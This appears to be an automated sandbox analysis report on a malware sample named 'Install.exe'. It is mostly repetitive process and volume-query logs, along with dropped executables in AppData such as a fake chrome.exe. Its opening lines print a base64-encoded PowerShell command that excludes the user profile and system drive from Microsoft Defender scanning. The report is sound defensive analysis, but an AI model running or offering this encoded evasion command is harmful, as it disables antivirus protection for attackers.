Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"

Source: C:\Windows\System32\dllhost.exe

39_2_0000000140001F00

Source: C:\Windows\System32\dllhost.exe

39_2_0000000140001F00

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Roaming\34432.exe	Queries volume information: C:\Users\user\AppData\Roaming\34432.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Queries volume information: C:\Users\user\AppData\Roaming\Chrome\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Queries volume information: C:\Users\user\AppData\Roaming\Chrome\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\nslookup.exe

Code function: 22_2_000000014000C920 cpuid

22_2_000000014000C920

Source: C:\Users\user\AppData\Roaming\34432.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\nslookup.exe

Code function: 22_2_00000001400029E8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

22_2_00000001400029E8

Source: C:\Windows\System32\dllhost.exe

39_2_0000000140001F00

Source: C:\Users\user\Desktop\Install.exe

1_2_0040352D

Windows Analysis Report
Install.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

